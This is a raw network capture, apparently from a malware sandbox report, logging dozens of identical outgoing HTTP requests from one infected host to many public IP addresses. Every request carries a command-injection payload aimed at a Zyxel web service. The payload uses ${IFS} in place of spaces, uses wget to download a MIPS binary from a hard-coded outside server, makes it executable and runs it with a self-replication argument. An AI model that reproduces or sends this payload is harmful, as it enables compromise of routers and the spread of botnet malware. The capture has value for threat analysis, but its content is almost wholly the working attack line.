                                      Jan 14, 2024 15:50:54.490184069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6472192.168.2.1441570179.48.56.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.490232944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6473192.168.2.1459462122.37.38.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.490259886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6474192.168.2.1460012115.58.121.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.490318060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6475192.168.2.1436734156.43.150.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.490371943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6476192.168.2.1460860115.141.219.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.490386963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6477192.168.2.1452148136.113.228.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.490452051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6478192.168.2.1450722126.231.207.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.490478039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6479192.168.2.1451502178.222.218.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.490510941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6480192.168.2.144317445.13.0.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.490556955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6481192.168.2.145484279.174.31.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.490592957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6482192.168.2.1439200156.37.88.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.490649939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6483192.168.2.1460568119.116.139.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.490669012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6484192.168.2.1441416179.159.224.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.490720987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6485192.168.2.144040659.211.36.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.490768909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6486192.168.2.143721227.178.109.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.490804911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6487192.168.2.1441722161.239.144.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.490833044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6488192.168.2.145952071.206.21.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.490880013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6489192.168.2.1451070184.59.17.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.490931988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6490192.168.2.1443432120.71.104.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.490967989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6491192.168.2.144733448.128.245.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.490991116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6492192.168.2.1439920218.194.245.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.491034985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6493192.168.2.1450274200.48.49.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.491090059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6494192.168.2.14431088.95.130.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.491106987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6495192.168.2.1440520218.176.156.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.491137028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6496192.168.2.145893653.141.43.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.491189003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6497192.168.2.1437770176.25.169.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.491223097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6498192.168.2.144917845.241.157.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.491254091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6499192.168.2.144075864.229.139.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.491305113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6500192.168.2.144792253.191.19.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.491360903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6501192.168.2.143682088.186.16.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.491384983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6502192.168.2.143448631.118.117.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.491413116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6503192.168.2.1455090183.79.168.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.491481066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6504192.168.2.145898468.50.67.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.491499901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6505192.168.2.1456032138.67.231.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.491518974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6506192.168.2.1433144130.118.221.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.491554976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6507192.168.2.145316412.80.223.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.491616964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6508192.168.2.1446746191.131.72.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.491651058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6509192.168.2.1459670137.174.80.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.491693020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6510192.168.2.1459062154.109.115.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.491736889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6511192.168.2.1443026135.45.165.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.491770029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6512192.168.2.1443118123.137.210.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.491812944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6513192.168.2.1442552160.194.155.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.491835117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6514192.168.2.1449112104.143.56.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.491895914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6515192.168.2.1456026109.156.177.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.491949081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6516192.168.2.145210612.195.179.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.491991997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6517192.168.2.1457616173.177.181.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.492029905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6518192.168.2.1437406152.33.195.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.492079020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6519192.168.2.144453084.167.176.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.492119074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6520192.168.2.144594888.242.135.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.492167950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6521192.168.2.145683037.13.27.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.495433092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6522192.168.2.1437504216.179.233.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.495903015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6523192.168.2.144884240.52.201.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.495933056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6524192.168.2.145064499.158.30.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.495970964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6525192.168.2.1452284121.166.164.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.496001959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6526192.168.2.1458534149.192.143.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.496062040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6527192.168.2.1433182193.125.36.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.496093988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6528192.168.2.145930213.145.109.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.496131897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6529192.168.2.1442226222.216.128.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.496169090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6530192.168.2.145692072.59.227.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.496201038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6531192.168.2.145022886.13.197.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.500447035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6532192.168.2.1447004126.116.163.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.500483990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6533192.168.2.143928013.250.190.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.500519037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6534192.168.2.1459282155.136.59.36443
                                      TimestampBytes transferredDirectionData
